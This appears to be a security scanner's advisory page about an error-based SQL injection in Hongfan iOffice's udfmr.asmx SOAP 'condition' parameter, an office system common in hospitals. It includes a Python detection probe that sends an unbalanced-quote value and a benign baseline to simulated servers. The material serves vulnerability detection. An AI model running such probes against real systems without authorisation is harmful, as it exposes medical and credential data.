Hongfan OA SQL Injection Scanner
Detects 'SQL Injection' vulnerability in Hongfan iOffice.
Short Info
Level: High
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 24 days 9 hours
Scan only one: Domain, IPv4, Subdomain
Toolbox: -
Hongfan iOffice is an office automation (OA) platform used to run an organization's administrative processes: document management, workflow approval, and internal communication. It is particularly common in Chinese hospitals and other healthcare facilities, where it is also distributed as a healthcare-oriented "medical cloud" OA edition. By routing approvals and records across departments through one system, it reduces administrative overhead, and it is widely adopted by small and medium-sized healthcare organizations that want centralized control over their operations. Its user-friendly interface and customizability have contributed to its spread.
SQL Injection (SQLi) is a critical vulnerability in which an attacker interferes with the queries an application sends to its database. It arises when the application builds SQL statements by concatenating untrusted input into the query text instead of passing it as a bound parameter, so that crafted input is parsed as SQL rather than as data. Once exploited, SQLi lets attackers read data they should not be able to retrieve, including other users' records and anything else the application's database account can reach, and often modify or delete it. Exploiting an SQL injection therefore compromises the confidentiality, integrity, and availability of the application and the underlying data, and attackers can frequently escalate from the database to the database server itself or to other applications sharing it.
The Hongfan iOffice vulnerability lies in the udfmr.asmx web service (an ASP.NET ASMX endpoint invoked through SOAP). The value of the 'condition' parameter in the SOAP request body is embedded into a database query without validation or parameterization, so a crafted value changes the meaning of the query. Detection is error-based: a probe value that breaks the query syntax causes the backend database to raise an exception, and the web service returns it in the SOAP fault. The telltale string is "System.Data.SqlClient.SqlException", the ADO.NET exception type for Microsoft SQL Server, which also identifies the backend as SQL Server. Because the same exception can appear for unrelated reasons (for example a broken database connection), the scanner should compare the response to a probe against the response to a benign value and report only when the error appears for the probe alone.
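The check described above, written out as an added example that is not the scanner's own code. It builds the SOAP request around the 'condition' parameter, sends a benign baseline value and then a probe with an unbalanced single quote, and reports a finding only when the probe response contains the SQL Server error marker and the baseline does not. The SOAP method name (ExampleMethod), the default http://tempuri.org/ namespace, the baseline and probe values, and the three simulated servers with their fault bodies are all assumptions constructed for this example; the page names only the endpoint (udfmr.asmx), the parameter ('condition'), and the "System.Data.SqlClient.SqlException" marker. Replace the fake transport with a real HTTP POST to the udfmr.asmx endpoint to use it against a target you are authorized to test.

```python
"""Error-based SQLi probe for an ASMX SOAP 'condition' parameter.

Added example, not the scanner's or vendor's code. Assumptions (not given on
the page): the SOAP method name, the default ASMX namespace, the benign and
probe values, and the simulated server responses below.
"""
import re
from typing import Callable, Dict, Tuple
from xml.sax.saxutils import escape, unescape

# Primary marker from the page; the other two are standard SQL Server
# syntax-error messages used as secondary evidence.
SQL_ERROR_MARKERS = (
    "System.Data.SqlClient.SqlException",
    "Unclosed quotation mark",
    "Incorrect syntax near",
)

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
ASMX_NS = "http://tempuri.org/"  # assumed: ASMX default namespace

# Transport signature: send(envelope, headers) -> (status, body)
SendFn = Callable[[str, Dict[str, str]], Tuple[int, str]]


def build_soap_envelope(method: str, condition: str, ns: str = ASMX_NS) -> str:
    """Wrap 'condition' in a minimal SOAP 1.1 body for an ASMX method.

    The value is XML-escaped so the probe survives the XML parser and reaches
    the SQL layer intact (escape() leaves single quotes alone).
    """
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
        f'<{method} xmlns="{ns}"><condition>{escape(condition)}</condition></{method}>'
        "</soap:Body></soap:Envelope>"
    )


def soap_headers(method: str, ns: str = ASMX_NS) -> Dict[str, str]:
    """Headers an ASMX endpoint expects for a SOAP 1.1 call."""
    return {"Content-Type": "text/xml; charset=utf-8", "SOAPAction": f'"{ns}{method}"'}


def sql_error_in(body: str) -> bool:
    """True if the response body carries a SQL Server error marker."""
    return any(marker in body for marker in SQL_ERROR_MARKERS)


def probe_condition_sqli(send: SendFn, method: str,
                         benign: str = "1", probe: str = "1'") -> Tuple[bool, str]:
    """Two-request error-based check; returns (vulnerable, reason).

    A single unbalanced quote breaks a query that concatenates 'condition'
    verbatim. The baseline request guards against endpoints that fault on
    every request, which would otherwise be a false positive.
    """
    _, baseline_body = send(build_soap_envelope(method, benign), soap_headers(method))
    if sql_error_in(baseline_body):
        return False, "baseline already returns SQL errors; endpoint unstable, not conclusive"
    _, probe_body = send(build_soap_envelope(method, probe), soap_headers(method))
    if sql_error_in(probe_body):
        return True, "probe triggered a SQL Server error that the baseline did not"
    return False, "no SQL error difference between baseline and probe"


# --- Constructed responses standing in for a real udfmr.asmx server ---------
OK_BODY = '<?xml version="1.0"?><string xmlns="http://tempuri.org/">ok</string>'
SQL_FAULT_BODY = (  # shape of an ASP.NET SOAP fault; constructed for this example
    '<soap:Fault><faultcode>soap:Server</faultcode><faultstring>'
    "System.Web.Services.Protocols.SoapException: Server was unable to process "
    "request. ---> System.Data.SqlClient.SqlException: Unclosed quotation mark "
    "after the character string ''.</faultstring></soap:Fault>"
)


def _condition_from(envelope: str) -> str:
    match = re.search(r"<condition>(.*?)</condition>", envelope, re.S)
    return unescape(match.group(1)) if match else ""


def vulnerable_fake_send(envelope: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Simulates string concatenation: an odd number of quotes breaks the query."""
    if _condition_from(envelope).count("'") % 2 == 1:
        return 500, SQL_FAULT_BODY
    return 200, OK_BODY


def safe_fake_send(envelope: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Simulates a parameterized backend: the quote is just data."""
    return 200, OK_BODY


def noisy_fake_send(envelope: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Simulates a broken database connection: every request faults."""
    return 500, SQL_FAULT_BODY


if __name__ == "__main__":
    for name, send in (("vulnerable", vulnerable_fake_send),
                       ("patched", safe_fake_send),
                       ("unstable", noisy_fake_send)):
        print(name, probe_condition_sqli(send, "ExampleMethod"))
```

The baseline comparison is what keeps this check honest: a host whose database is simply down returns the same SqlException text for every request, and a single-request scanner would flag it as injectable.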
If successfully exploited, the SQL injection in Hongfan iOffice gives an unauthenticated attacker the ability to run arbitrary queries against the backend database. That exposes sensitive information including, but not limited to, user credentials, medical records, and administrative data, and allows that data to be altered or deleted. Depending on the privileges of the database account the application uses, it can escalate to full compromise of the database server. For a hospital this can mean losing access to patient records and other operational data, severely disrupting clinical and administrative work.
REFERENCES
- https://github.com/lal0ne/vulnerability/blob/main/%E7%BA%A2%E5%B8%86OA/iOffice_sqlscan/sql.py
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%BA%A2%E5%B8%86%E5%8C%BB%E7%96%97%E4%BA%91%20OA%20udfmr.asmx%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md